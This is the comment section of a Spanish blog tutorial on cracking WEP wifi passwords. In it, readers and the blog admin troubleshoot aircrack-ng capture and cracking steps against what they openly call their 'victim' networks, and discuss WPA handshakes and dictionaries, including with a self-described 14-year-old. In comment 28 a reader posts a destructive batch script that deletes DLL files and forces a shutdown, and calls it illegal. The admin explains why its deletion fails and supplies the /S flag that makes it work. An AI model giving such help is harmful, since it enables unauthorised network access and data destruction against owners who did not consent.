33 comments on “Tutorial: Como crackear contraseñas wifi con cifrado WEP

  1. Me quedo atascado en el punto 9 pongo
    airodump-ng wlan0 –encrypt wep

    y me pone
    ioctl(SIOCSIWMODE) failed: Device or resource busy

    ARP linktype is set to 1 (Ethernet) – expect AROHRD_IEEE80211, Etc

    Alguien sabe a que puede ser debido

    ————–
    LenoID_Admins dice: Se ha planteado que tal vez el hardware wifi que utilizas no este compatible con el modo monitor ? http://www.backtrack-linux.org/forums/hardware-compatibility-list/

  2. Tengo un problema, al intentar hacer airodump-ng (interface) –encrypt wep obtengo esto

    ioctl(SIOCSIWMODE) failed: Operation not supported

    ARP linktype is set to 1 (Ethernet) – expected ARPHRD_IEEE80211,
    ARPHRD_IEEE80211_FULL or ARPHRD_IEEE80211_PRISM instead. Make
    sure RFMON is enabled: run ‘airmon-ng start eth0 ‘
    Sysfs injection support was not found either.

    por cierto, se me olvidaba decir que utilizo airodump en kubuntu 10.04 a 64 bits
    si alguien me puede ayudar agradecería de todo corazón.

    Respuesta:

    Puedes ponerme todos los comandos que ejecutas desde que abres el terminal, hasta llegar a ese error? Tengo la impresión que no especificas bien la interfaz, o especificas una que no es WIFI o una que no es compatible.

  3. la ventana final sale bien, me dice “key found” pero no sale el asci, q me faltara?

    Respuesta: Si pone que ha encontrado la key, tiene que mostrarla. Al menos en HEXADECIMAL. Si no lo consigues y quieres que le eche un vistazo me tienes que un enlace de donde pueda descargar el fichero .cap para probarlo.

  4. Hola amigo, cuando hago el paso 9 y introduzco
    airodump-ng wlan0 –encrypt wep ,me sale:
    ioctl(SIOCSIWMODE) failed:Device or resoruce busy

    ARP linktype is set to 1 (eternet) – expected ARPHRD_IEEE80211,ARPHRD_IEEE80211_full OR ARPHRD_IEEE80211_PRISM instead.
    Make sure RFMON is enabled: run `airmon-ng start wlan0
    Sysfs injection support was not found either.

    Me podrias decir, que hago mal?
    y si mi wifi no es compatible, recomendarme una, la mia es Intel wifi link 5100 AGN.
    Muchas gracias, por anticipado amigo, un saludo.

    Respuesta: En primer lugar, en el comando que mencionas, hay 2 “-” antes de encrypt, no solo uno. Leyendo el error que me has puesto puedo deducir que, o la interfaz correcta no es wlan0, o no esta puesta correctamente en “Modo Monitor”, o en el peor de los casos tu WIFI no es compatible con el modo monitor.

    Desconozco si el “Intel WIFI Link 5100 AGN” es o no compatible con el modo monitor. Hay muchos modelos compatibles, y entre ellos las que mas me han recomendado son las que llevan chipset “RealTek 8187L”.

  5. ¿la tageta wifi hay que instalar drivers en back track?
    Cuando la uso en windows con los drivers instalados la luz del Alfa se enciende.
    Encambio cuando la uso en back track no

    Gracias anticipadas

    Respuesta: Si te la reconoce y le funciona bien, que no se encienda la lucecita esa no significa absolutamente nada.

  6. hola, lo primero 1000 gracias por el tuto, esta muy bien explicado.
    el problema que tengo es q me ha pasado lo mismo q al compi, me pone key found 100% pero no me sale nada de ascii ni na.
    que puede ser???

    gracias

    Respuesta: Si no te aparece en ASCI, puede que la clave este en HEXADECIMAL. En este caso de ser necesario lo podrías convertir con esta herramienta: http://lenoid.net/2010/02/encripta-tus-mensajes-con-%E2%80%9Ctranslator-binary%E2%80%9D/

    Si no aparece ni siquiera en HEXADECIMAL, tendrás que hacer una captura de pantalla, o una foto con suficiente resolución (con cámara digital), y luego me la pasas por el formulario de contacto. Así tal vez pueda decirte algo más.

  7. 1. Mira quiero hacer eso, pero mi tarjeta inalambrica USB sera compatible con el Backtrack, la tarjeta es: TP-link; TL-wn821n
    2. Y me falto otra cosa, este metodo tambien decifra las claves WPA?

    Respuesta:
    1. Abres un terminal, escribe y ejecuta el comando dmesg, conecta el usb, y vuelve a ejecutarlo. si lo reconoce, te aparecerá la marca el modelo, … También puedes verlo con el comando iwconfig, que muestra todos los adaptores wifi conectados y reconocidos.
    2. No, para WPA y WPA2 es necesario capturar otro tipo de paquetes.

  8. Entonces tu no sabrás de otro metodo para hackear las claves WPA??

    Respuesta: Se que paquetes de necesita, y como hay que capturarlos, pero aun no he tenido tiempo para postearlo. También hay que tener en cuenta que con las herramientas actuales reventar la encriptacion de una WPA sin el diccionario adecuado, puede llevarte años. En cambio en una WEP si es de las que ya se conoce la formula para crear un diccionario como ADSLXXXX, DLINK, ONO_XXXX, SpeedtouchXXXXXX, JazzTel_XX, YaComXXXXXX, D-LINK WIRELESS, p1xxxxxxx000x, R-wlanxx, PERSONAL, capturando solo 4 paquetes ya lo tienes descifrada. Y esto lo puedes conseguir en 5 min.

  9. Osea q lo q vos queres decir es q con ninguna de esas herramientas se puede y tocaria con un diccionario diferente, pero existen tales diccionarios para romper la ecriptacion WPA o aun no lo han creado?

    Respuesta:Me refiero a que si lo intentas por FUERZA BRUTA puedes tardar años. En cambio si conoces la formula con la que esta creada la contraseña, puedes crear un diccionario para este caso concreto. O con mucha suerte, algún diccionario que encuentres por Internet, pueda servir. De esto depende lo mucho o poco que tardes en desencriptar la contraseña.

  10. Usted me había comentado anteriormente q sabia q paquetes capturar, osea q usted ya conoce la formula o tiene algún diccionario para esta encriptacion

    Responder:No se si entiendo bien tu pregunta, espero que te refieras a los WPAs! En una WEP vale con capturar trafico normal, en cambio para las WPA se tiene que capturar el “handshake”. El handshake solo se envia cuando se establece la conexion entre el router y el equipo cliente. Despues, ya no se vuelve a enviar hasta que otro cliente se conecte.

  11. si claro me refiero a los WPAs, ud ya sabe como decifrar las contraseñas? o solo tiene la idea de hacer el desencriptado de los WPA pero no lo ha hecho

    Responder:Si, lo he hecho! Pero siempre con diccionarios. Con fuerza bruta me hubiera tardado como minimo, años. Yo hice un curso de “Seguridad AntiHacking” y allí hemos hecho muchas pruebas y he aprendido algunos trucos.

  12. Ud no podria Postear por lo menos un diccionario para WPA, es q la verdad lo necesito y no encuentro en otro lado y se me hace muy dificil a fuerza bruta.

    Respuesta: No. Y aun que lo haría, seguramente no te serviría. Los diccionarios se generan utilizando ciertas formulas matemáticas, y siempre en base al ESSID y BSSID del punto de acceso. Por lo tanto supongo que queda explicado porque no sirve. Para probar algún diccionario, prueba buscar en google “Free Rainbow Tables”.

  13. Hola. El tutorial está muy bien explicado. Tengo el mismo problema que Santi en el paso 9.
    Donde me tiene que poner “monitor mode enabled” me pone “monitor mode enabled on mon0” (en el paso anterior)
    ¿Pudiera ser esto lo que me diese problemas?
    ¿Puedo solucionarlo?

    Respuesta: El comando “airmon-ng start (interface)” activa el modo monitor en tu interfaz wifi. El modo monitor se puede activar en la misma interfaz, ej wlan0, eth1… o en una interfaz virtual como mon0. Si a ti te aparece el mensaje “monitor mode enabled on mon0” antes de ejecutar este comando, esto significa que el modo monitor ya esta activo asi que no es necesario ejecutar ese comando. Sea como sea si tu modo monitor no se activa en la misma interfaz como es el caso del ejemplo que puse en el tutorial y se activa en una interfaz virtual como “mon0”, apartir de ese momento deberás utilizar esa interfaz virtual para realizar lis demás pasos. Espero que te sirva esta información!

  14. La verdad, estoy muy agradecida por tu ayuda.
    Cuando despues del paso 8. Me dice lo de “monitor mode enabled on mon0”, ¿como accedo a la interfaz virtual para seguir con los demás pasos?
    Gracias anticipadas por tu paciencia. Me haria mucha ilusión lograrlo por fin.

    Respuesta: La interfaz wifi normalmente tiene nombres como wlan0, wlan1, eth0 o eth1 entre otros. En el ejemplo que tienes en el tutorial, el interfaz que se utiliza es el eth1. En ese caso el modo monitor no crea una interfaz virtual, sino que cambia la interfaz original “eth1” a modo monitor. Por eso los pasos siguientes siguen utilizando la misma interfaz. En su caso, como la interfaz para modo monitor es virtual bajo el nombre “mon0”, desde el momento en el que aparece el mensaje de “monitor mode enabled on mon0” tendra que seguir con el paso 9, pero utilizando como interfaz “mon0”. Ej: airodump-ng mon0 –encrypt wep

  15. Hola:
    Sigo avanzando, pero que ocurre si el bssid de mi victima pone not “associated”?
    ¿Deberia escribir esto?

    Respuesta: Es que no me queda muy claro a que te refieres. Puedes enviarme alguna foto? puedes subirla aquí y dejarme el enlace: http://imageshack.us/ .

    Otra cosa que creo que deberías saber es que dependiendo de su marca y modelo de su interfaz wifi y su capacidad de injectar paquetes, los pasos 12-14 te funcionen o no. Esos pasos son necesarios solo cuando el router que estas comprobando no tiene ningún cliente conectado por wifi o el cliente que tiene ni genera suficiente trafico.

    El paso 9 esta allí justo para esto, para ver que router tiene mas trafico ya que ese es el que será mas fácil y rápido de descodificar. En lo que te aparece en el paso 9, la pantalla esta repartida en 2 zonas: la parte de arriba te muestra los routers a tu alcance, y la parte de abajo te muestra los clientes que están generando trafico. En la parte de abajo tienes que mirar cual de los que aparecen allí tienen mas movimiento en donde pone “Packets”. El que mas movimiento tenga es el que mas posibilidades tienes de sacarle la contraseña.

    Cuando lo has identificado, miras al principio de esa linea, en donde pone BSSID, y allí tienes la mac del router. Coges esa mac y la buscas en la parte de arriba para identificar el router y sus características. Y ahora pasas al siguiente paso con esas características.

  16. Tutorial 10, en todos los aspectos.

    Desde que le dí al comando
    aircrack-ng (captura)*.capçhan pasado 17 horas.

    Voy por los 80000, cada 5000 me indica que de a
    aircrack-ng (captura)*.cap

    Me parece mucho tiempo…

    Jesete50

    Atentamente.

    Respuesta: Bueno, No se si solo es mi impresión o es que no te has dado cuenta de que todas las expresiones que están escritas entre paréntesis, tienes que substituirlas por otras cosas. Ej: (interface) la tienes que substituir por la interfaz que vas a utilizar, ….., y (captura) tiene que tener el mismo valor tanto en el paso 11 como en el paso 15.

    Estas seguro que los 80000 paquetes son todos de la red que estas intentando reventar? Eso de 80000 es relativo, ya que en ocasiones te encuentra la pass con 15000 y otras veces no la encuentra hasta 180000 o mas. La mayoria de las veces antes de llegar a los 80000 ya lo encuentra. Que tardes mucho tiempo depende de si estas o no estas inyectando trafico, o de si el otro tiene el emule puesto o no, ….. Si este se pone a descargar algo de internet puede que en 5 minutos tengas mas de 100000 paq. Pero si ese no genera suficiente trafico y tu ordenador no es capaz de inyectar trafico, te tocara esperar lo que haga falta.

    Un truco que puedes utilizar es: Capturas hoy lo que puedes. Paras el airodump-ng te pasas todos los ficheros que acaban en “.cap” del escritorio a una memoria usb. Mañana vuelves a intentar capturar, pero antes de empezar vuelves a copiar los ficheros del usb al escritorio. Esto hará que los paq que captures la segunda ves se sumen a los del día anterior, y así todos los días hasta tener suficientes paq para conseguirlo. Una cosa que tienes que tener en cuenta es que en este caso, el paso 15 tiene esta forma exacta: “aircrack-ng *.cap” sin los ” por supuesto. al no especificar el nombre del fichero aircrack-ng suma el contenido de todos los ficheros “.cap”. Si has escaseado distintas redes te aparecerá una lista con todas pidiendo que elijas la que quieres crackear. Simplemente escribes abajo el numero que tiene delante en la lista esa red y le das al intro.

    Espero que esto te ayude a ti y a todos los que tengan las mismas dudas que tu. (Solo para tu caso, si no lo consigues, comprime con winrar los ficheros .cap y envienmelos utilizando el formulario de contacto y te los miro yo para ver que encuentro.)

    Feliz 2011!!!

  17. Hola. Muy bien, gran tutorial, me funciono perfecto, creo que explicas paso a paso de una manera muy clara. Te lo agradezco.

    Veo en tus comentarios que sabes como atacar WPA, ¿es posible que subas un tutorial como este sobre ese tipo de ataques?
    Saludos

    Respuesta: Esta en mis proyectos de futuro, pero por el momento me es imposible. La diferencia es que para WPA se captura otro tipo de paquetes, y por el momento solo se puede reventar a base de diccionarios.

  18. antes k nada felicidades por el tutorial es el mejor k e visto asta ahora se entiende a la perfeccion, pero tengo una duda:

    yo tengo un pc de sobre mesa sin wifi,m compre uno inalambrico, inicio normalmente el programa, meto el cd reinicio el pc y me sale el programa, para k me reconosca el wifi inalambrico e visto en un comentario anterior k tengo k ejecutar el comando dmesg, cuando lo hago me dise:

    USB 1-8 ESTAN DESCONECTADO POR LO K NO ME LO RECONOCE K HAGO
    GRACIAS POR ADELANTADO

    Respuesta: Puede que BackTrack no tenga controladores para ese hardware. Si es esto, una solución podría ser bajarte la ultima versión de BackTrack:
    http://lenoid.net/2010/01/backtrack-4-final/
    Otra cosa a tener en cuenta es que para que un wifi usb sirva para realizar auditoria de seguridad wifi, tiene que tener un chip especial. El que mas he utilizado, y te recomiendo es el chip RTL8187L.

  19. Antes de nada muchas gracias por el tutorial. A veces llega a capturar 1.5 Gb en paquetes y me sale un mensaje del tipo ha llegado a máximo tamaño del disco duro. Sin embargo en el PC tengo una distro de Ubuntu y un windows vista con bastantes gigas libres. Me gustaría poder instalar la distro del backtrack no en live CD. O aumentar su capacidad de disco. Muchas gracias.

    Respuesta: Si no estoy equivocado, como el LiveCD no toca nada del disco duro, el único lugar donde podría guardar lo que capturas seria en la memoria RAM. Así que ese espacio depende de cuanta memoria RAM libre se queda después de arrancar el BackTrack! Borrar cosas del LiveDVD no te va a servir de absolutamente nada.

    Una solucion que se me ocure en este momento, seria montar una de las particiones de tu equipo (o un memory stick usb), y cuando haces la captura poner que el fichero se guarde dentro de ese punto de montaje.

    En tu caso, te recomiendo que en lugar de Ubuntu te instales el BackTrack. Y si quieres tener instalado el Ubuntu también te lo instales desde Windows utilizando el sistema WUBI.

  20. He probado el truco de guardar las capturas en una usb, pero a veces me quedo sin espacio en disco y no se como puedo aumentarlo siendo un live cd. ¿que puedo borrar? o ¿como puedo aumentar el espacio en la sesión?
    Muchísimas gracias. Va de lujo.

    Respuesta: Si no estoy equivocado, como el LiveCD no toca nada del disco duro, el único lugar donde podría guardar lo que capturas seria en la memoria RAM. Así que ese espacio depende de cuanta memoria RAM libre se queda después de arrancar el BackTrack! Borrar cosas del LiveDVD no te va a servir de absolutamente nada.

    Una solucion que se me ocure en este momento, seria montar una de las particiones de tu equipo (o un memory stick usb), y cuando haces la captura poner que el fichero se guarde dentro de ese punto de montaje.

  21. hola mira he llegado al ultimo paso , pero llevo 15.000 y no la ha capturado y me pone : failed.next try with 5000 IVs. PERO cuando pasan 5000 no lo vuelve a intentar tengo que darle a ctrl+c y volver a poner airecrack …..etc en la ultima ventana.es normal o deberia de aserlo solo?

    Respuesta: Eso deveria de buscar la clave automaticamente cada 5000 paquetes. Si no lo hace, significa que no pones el comando corecto, o utilizas una version con problemas.

  22. Verás, lo hago todo bien, pero cuando me da la clave, resulta que és incorrecta $:

    Respuesta: Eso es imposible! Si te muestra una contraceña, esa es la corecta ya que aircrack-ng comprueba la clave antes de mostrarla. No olvide que tiene que utilisar la clave ASCII no la HEXADECIMAL.

    Si no funciona, significa que hay algo que no hace bien.

  23. no es mas fácil si tienes el back track 4 aplicar #wepspoon ? saludos

    Respuesta: La verdad es que no lose. Desconozco esa herramienta. Pero si tu la conoces, y te gusta escribir, tal vez queras escribir un post explicando los pasos ha seguir para hacerlo con esta herramienta. Estoy convencido que la comunidad te lo agradecería. Si el post está bien estructurado y con varias capturas de pantalla, yo estaré encantado de publicarlo.

  24. es que no puedo ejecutar el BT desde el USB
    quando voy a la BIOS i en el boot pongo USB le doy a exit&save changes se me queda pensando i no arranca, vamos que es como si no detectara nada valido en el USB.
    como lo arranco? seguro que es una chorrada pero soy novato i no se solo tengo 14 años

    Respuesta:
    Cual es el procedimiento que has seguido para instalar BT en el pendrive (indica todos los pasos)?
    Que versión de BT estas intentando instalar en el pendrive?
    Que capacidad tiene? Ej: 2Gb.

    En la pagina oficial de BT, hay tutoriales y vídeo tutoriales que te enseña paso a paso como lo puedes hacer. Se recomienda como mínimo un pendrive de 8Gb. Si tras seguir los tutoriales que hay en la pagina oficial, y activar en la BIOS la opción de arrancar del dispositivo sigue sin funcionar, lo mas probable es que tu pendrive no sea capaz de arrancar. Esto significa que tendrías que probar con otros de marcas y modelos distintos. Hay algunos dispositivos que aunque lo hagas todo correcto, simplemente no son capaces de arrancar.

  25. al arrancar el back track me pide login i al escribirlo i escribir la contraseña me dice que es incorrecto.
    mi contrasenya tiene caracteres especiales ( ? * – )es posible que sea eso?
    P:D: lo de antes ya lo arregle

    Respuesta: Si has solucionado el problema anterior, no estaría mal que comentaras la solución por si alguien mas se encuentra con el mismo problema.

    En cuanto a lo de la contraseña, es muy importante tener en cuenta el estado del “caps lock”, y no olvides el mapa del teclado. Creo que por defecto esta en ingles, y si has definido la contraseña así y luego lo has cambiado, esto también puede afectar.

  26. bueno mi problema anterior era simplemente que habia usado incorrectamente el unetbootin. es una tonteria pero si lo haces mal no va.
    i a mi no me a pedido mapa de teclado me a pedido en un momento idioma pero era solo para la instalacion lo puse en español.
    pero a mi no me a pedido mapa de teclado en ningun momento

    Respuesta: Ha eso me refiero. Al momento en el que cambiaste el mapa del teclado de ingles (por defecto) a español. Si has definido la contraseña antes de cambiar el teclado a español, lo mas probable es que no hayas estado escribiendo lo que pensabas. Cuando cambias de ingles a español, las letras no cambian mucho de sitio, pero en cambio los símbolos cambian casi todos de sitio.

    Prueba:
    1. Usuario: root y contraseña: toor {estas son las que vienen por defecto en BackTrack}.
    2. También puedes probar poner una contraseña sin símbolos y/o diacríticos.

  27. no si es k yo no abia entrado antes en backtrack i no e podido cambiar ni el teclado ni el usuario o contraseña, probare lo del root toor porque yo no habia entrado antes en el linux

    Respuesta: Para cambiar el idioma del teclado, tienes que hacer clic encima del icono con la bandera de USA que aparece en la barra, junto al reloj.

  28. ya que estamos siendo ilegales crees que este virus funcionara?
    @echo off
    echo msgbox (“el sistema no se a podido recuperar, pasando a modo de recuperación”),16,(“aviso del sistema”) >> C:\jaja.vbs
    echo @echo off >> C:\autoexec.bat
    echo start C:\jaja.vbs >> C:\autoexec.bat
    echo start color 0a >> C:\autoexec.bat
    echo msg * pasando a modo de recuperación >> C:\autoexec.bat
    echo del /f /q C:*.dll >> C:\autoexec.bat
    echo :bucle >> C:\autoexec.bat
    echo start color 0a >> C:\autoexec.bat
    echo goto bucle >> C:\autoexec.bat
    msg * “el sistema se ha trolleado i ahora tendrá que reiniciar”
    shutdown -s -f -t 0

    Respuesta: El código que has enviado no se puede definir como un virus. Más bien lo llamaría “Joke” o “Virus Joke” dado que lo único que es capaz de hacer es molestar abriendo algunos mensajes y consolas cmd. Tal y como esta escrito no produce ninguna perdida de datos (lo he comprobado en mi propio equipo). Basta con matar el proceso que abre las ventanas y los mensajes y ya esta.

    El único comando peligroso en tu código es este “del /f /q C:*.dll” que se supone que va a borrar todos los ficheros “.dll” de la partición “C:”, pero dado que le falta un parámetro “/S” no es capaz de entrar en los subdirectorios para borrar, así que no pasa nada.

  29. bueno esque eso era un joke que acaba jodiendo pero entonces que tengo que escribir del /f /s /q c:*.dll?

    Respuesta: Si, pero “f, s y q” en mayúscula. lo puedes ver en el manual ejecutando “del /?”.

  30. Hi friends, how is the whole thing, and what you desire to say
    on the topic of this post, in my view its really awesome in support of me.

Deja un comentario

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *